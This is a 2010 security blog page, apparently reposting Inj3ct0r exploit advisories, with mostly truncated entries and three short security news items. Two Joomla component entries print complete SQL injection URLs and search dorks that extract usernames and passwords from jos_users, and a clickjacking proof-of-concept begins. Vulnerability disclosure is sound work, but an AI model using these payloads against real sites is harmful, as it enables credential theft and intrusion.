Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 23rd, 2010

libpng <= 1.4.2 Denial of Service Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>libpng &lt;= 1.4.2 Denial of Service Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
libpng &lt;= 1.4.2 Denial of Service Vulnerability
===============================================
/*
Exploit Title: libpng &lt;= 1.4.2 DoS
Date: [...]

Leave a Comment

RapidLeech Scrits Remote File Upload (transfer & run shell php)

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>RapidLeech Scrits Remote File Upload (transfer &amp; run shell php)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
RapidLeech Scrits Remote File Upload (transfer &amp; run shell php)
===============================================================
# Exploit Title: RapidLeech Scrits Remote File Upload ( transfer &amp; run shell php )???????????????????
# Date: 21/07/2010????????????????????????????
# Author: H-SK33PY?????????????????????
# [...]

Leave a Comment

Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Imagine-cms &lt;= 2.50 SQL Injection Exploit Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Imagine-cms &lt;= 2.50 SQL Injection Exploit Vulnerability
=======================================================
#!/usr/bin/perl
###########################################
#
# Script Name : Imagine-cms 2.50
#
# Version : 2.50
#
# Bug Type : SQL Injection
#
# Found by : Metropolis
#
# Home : http://metropolis.fr.cr
#
# Discovered : 21/07/2010
#
# [...]

Leave a Comment

WordPress Plugin myLDlinker SQL Injection Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>WordPress Plugin myLDlinker SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
WordPress Plugin myLDlinker SQL Injection Vulnerability
=======================================================
010101010101010101010101010101010101010101010101010101010
0 [...]

Leave a Comment

ZeeAdbox v2x SQL injection Vulnerabilty

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ZeeAdbox v2x SQL injection Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
ZeeAdbox v2x SQL injection Vulnerabilty
=======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

ZeeNetworking v1x Arbitrary File Upload Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ZeeNetworking v1x Arbitrary File Upload Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
ZeeNetworking v1x Arbitrary File Upload Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

ZeeMatri v3x Arbitrary File Upload Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ZeeMatri v3x Arbitrary File Upload Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
ZeeMatri v3x Arbitrary File Upload Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

ZeeClassifieds v1x Multiple Vulnerabilty

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ZeeClassifieds v1x Multiple Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
ZeeClassifieds v1x Multiple Vulnerabilty
========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla com_properties Persistent XSS Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla com_properties Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================
Joomla com_properties Persistent XSS Vulnerability
==================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla com_jomestate Persistent XSS Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla com_jomestate Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Joomla com_jomestate Persistent XSS Vulnerability
=================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_estateagent Persistent XSS Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_estateagent Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
Joomla Component com_estateagent Persistent XSS Vulnerability
=============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

PhotoPost PHP SQL Injection Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PhotoPost PHP SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
PhotoPost PHP SQL Injection Vulnerability
=========================================
# Exploit Title: PhotoPost PHP SQL Injection Vulnerability
# Date: 23/07/2010
# Author: Cyber-sec
# Software Link: www.photopost.com
# Version: 4.0 – 4.6
# Tested on: windows xp pack 3
# CVE : N/A
————————–exploit——————————
dork : [...]

Leave a Comment

PHP Login Script v 2.3 SQL Injection vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PHP Login Script v 2.3 SQL Injection vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================
PHP Login Script v 2.3 SQL Injection vulnerability
==================================================
# Exploit Title: PHP Login Script v 2.3 SQL Injection vulnerability.
# Date: 23/7 2010
# Author: pimpim – pyscripter94@gmail.com
# Software Link: http://php-login-script.com/php_login_v2.3.zip
# Version: 2.3
# [...]

Leave a Comment

Joomla Component com_golfcourseguide SQL Injection Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_golfcourseguide SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Joomla Component com_golfcourseguide SQL Injection Vulnerability
================================================================
# Exploit Title: Joomla Component com_golfcourseguide SQL Injection Vulnerability
# Date: 23.07.2010
# Author: Valentin
# Category: webapps/0day
# Version: v0.9.6.0 beta, v1 beta
# Tested on:
# CVE :
# Code :
[:::::::::::::::::::::::::::::::::::::: 0x1 [...]

Leave a Comment

Joomla Component com_huruhelpdesk SQL Injection Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_huruhelpdesk SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
=============================================================
Author : Amine_92
Email : [amine92_16@hotmail.fr]
Homepage : { www.vbhacker.net/vb }
DORK : inurl:&quot;index.php?option=com_huruhelpdesk&quot;
===================================================
[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&amp;view=detail&amp;cid[0]=[SQL]
[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0×3a,password%29,5,6,7+from+jos_users–
[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&amp;view=detail&amp;cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0×3a,password%29,5,6,7+from+jos_users–
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&amp;view=detail&amp;cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0×3a,password%29,5,6,7+from+jos_users–
====================================================
Thank’s [...]

Leave a Comment

Joomla Component com_iproperty SQL Injection Vulnerability

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_iproperty SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Component com_iproperty SQL Injection Vulnerability
==========================================================
Author : Amine_92
Email : amine92_16@hotmail.fr
Homepage : www.vbhacker.net/vb
DORK : inurl:&quot;index.php?option=com_iproperty&quot;
====================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_iproperty&amp;view=agentproperties&amp;id=[SQL]
[+] ExploiT :
index.php?option=com_iproperty&amp;view=agentproperties&amp;id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users–
[+] Example :
http://www.victime.com/index.php?option=com_iproperty&amp;view=agentproperties&amp;id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users–
====================================================
la illaha ila la mohamed [...]

Leave a Comment

Clickjacking Web Browser Multiple Vulnerability (FF3.6.7/SM 2.0.6)

Jul.23, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Clickjacking Web Browser Multiple Vulnerability (FF3.6.7/SM 2.0.6)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================================
Clickjacking Web Browser Multiple Vulnerability (FF3.6.7/SM 2.0.6)
==================================================================
&lt;html&gt;&lt;head&gt;
&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;
&lt;title&gt;FF3.6.7/SM 2.0.6 ClickJacking Vulnerability&lt;/title&gt;
&lt;/head&gt;&lt;body&gt;
&lt;div id=&quot;mydiv&quot; onmouseover=&quot;document.location=’http://www.mozilla.org’;&quot; style=&quot;border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: [...]

Leave a Comment

Hell Pizza customer database compromised?

Jul.23, 2010 in News

Security website Risky.Biz claims that Hell Pizza’s online customer database has been compromised, resulting in the leak of customer names, addresses, phone numbers, email addresses and even passwords.
The issue first surfaced on Geekzone back in August 2009 when forumgoers claimed that email addresses used only for Hell Pizza orders were receiving unrelated spam. However, the [...]

Leave a Comment

Critics point to cracks in proposed German encrypted e-mail system

Jul.23, 2010 in News

Some German IT experts are raising doubts about Germany’s DE-Mail encryption system by pointing to what they call a security problem in the proposed e-mail network, which was opened to the public for registration earlier this month.
E-mail sent through DE-Mail’s servers may be decrypted and re-encrypted up to two times before reaching its target, possibly [...]

Leave a Comment

Hackers Develop New Version of Zeus Bank Trojan

Jul.23, 2010 in News

As per the security firm ‘Computer Associates (CA),’ hackers have developed a new version of the Zeus crimeware toolkit. The researchers have named this new crimeware tool kit as the ‘Zeus version 3′.
The new Zeus program configuration includes the list of targeted financial organizations from Germany, Spain, the USA and United Kingdom. The preceding versions [...]

Leave a Comment